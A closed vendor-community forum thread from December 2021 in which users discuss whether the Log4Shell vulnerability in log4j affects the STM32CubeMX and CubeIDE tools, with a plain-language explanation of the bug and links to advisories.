Skip to main content
This topic has been closed for replies.

5 replies

Uwe Bonnes
Uwe BonnesAuthor
Chief
December 15, 2021

Sorry, somehow I managed to drop the question:

During startup, stcube prints a message about log4j. There are known vulnrerabilities about log4j. How does this impact stcube and the host system, stcube runs on?

TDK
TDK
Super User
December 15, 2021

Apparently the version used is so out of date that it's "safe". Not sure I'd trust that answer.

See: https://community.st.com/s/question/0D53W00001FmB6NSAV/i-am-using-cubemx-there-is-a-significant-security-vulnerability-of-apache-log4j-on-net-cubemx-has-this-issue-if-yes-do-you-have-any-fix-solution

"If you feel a post has answered your question, please click ""Accept as Solution""."
waclawek.jan
waclawek.jan
Super User
December 15, 2021

I wonder how exactly could an outside attacker achieve an entry to be inserted to CubeIDE/ CubeWhatever's log...

Do these programs have open listening IP ports?

JW

TDK
TDK
Super User
December 15, 2021

It will try to format the log message and if you have certain patterns in the message being logged, it will load an arbitrary file from a web address to do so. So if you can control what is being logged, perhaps if the program logs user input, you're toast.

It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep that it is even possible for this to happen. I'm not surprised it happened in Java.

I find it all quite interesting.

https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html

"If you feel a post has answered your question, please click ""Accept as Solution""."
Piranha
Piranha
Principal III
December 20, 2021

> It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep

That is also the past and future of the CubeMX. It started as a Microcontroller eXplorer and helped managing pins and clocks. Then the "initialization code generator" was added. Officially it's still called like that! But in reality it has gone down the full - "I'm clicking a project together completely in CubeMX. Something doesn't work. I no learn C. Help!!! Thank you, ser!" - mode. And even sane users want more and more customization. Initialization order, priorities, enable/disable by default etc. Eventually it will mimic all of the HAL in a million configurations, it will require the same amount of knowledge and be more complex to configure than writing a code, and the project will collapse under it's own weight.

waclawek.jan
waclawek.jan
Super User
December 16, 2021

I understand the mechanism of the bug. My question was towards how

> if you can control what is being logged,

can happen in the particular case of Cuben.

JW

waclawek.jan
waclawek.janBest answer
Super User
December 18, 2021

https://community.st.com/s/question/0D53W00001Fp7edSAB/stm32cube-tools-and-log4j

Terms & ConditionsAccessibility statement